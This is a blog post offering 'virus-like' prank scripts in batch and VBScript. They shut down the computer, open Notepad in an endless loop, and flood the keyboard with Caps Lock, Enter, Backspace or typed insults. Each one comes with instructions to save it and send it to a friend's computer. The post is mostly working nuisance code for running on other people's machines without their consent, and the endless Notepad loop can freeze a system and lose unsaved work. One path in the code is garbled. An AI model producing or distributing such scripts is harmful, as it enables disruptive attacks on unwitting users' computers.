Pages

Saturday, April 7, 2018

Virus writing code !!

Virus writing code !!


friends want to play with your friends computer..?

if yes then start reading this post.

In this article i came with new pranks (or) tricks (or) similar to virus creating ..
ya its acts like a virus but not virus its a simple programme.

Materials: NOTEPAD

By using only notepad you can create your own virus dont worry it doesnt effect your PC.

Ok the below are the codes of Virus like acting.

* Convey your friend a lil message and shut down his / her computer:

Type in notepad:

@echo off
msg * I dont like you
shutdown -c "Error! You are too stupid!" -s


Save it as "Anything.BAT" in All Files and send it.


* Open Notepad continually in your friends computer:

Type :

@ECHO off
:top
START %SystemRoot%system32 otepad.exe
GOTO top


Save it as "Anything.BAT" and send it.


* Toggle your friends Caps Lock button simultaneously:

Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.


* Frustrate your friend by making this VBScript hit Enter simultaneously:

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.


* Frustrate your friend by making this VBScript hit Backspace simultaneously:

Type :

MsgBox "Lets go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


Save it as "Anything.VBS" and send it.

* Ok this is my favorite , this script hacks your friends keyboard and make him type "You are a fool" simultaneously , u can change " you are a fool" to any anything u want .

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.


All this works until system will restart so dont worry
.


Please leave your comment ... i love comments
.





visit link download

Related Post

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.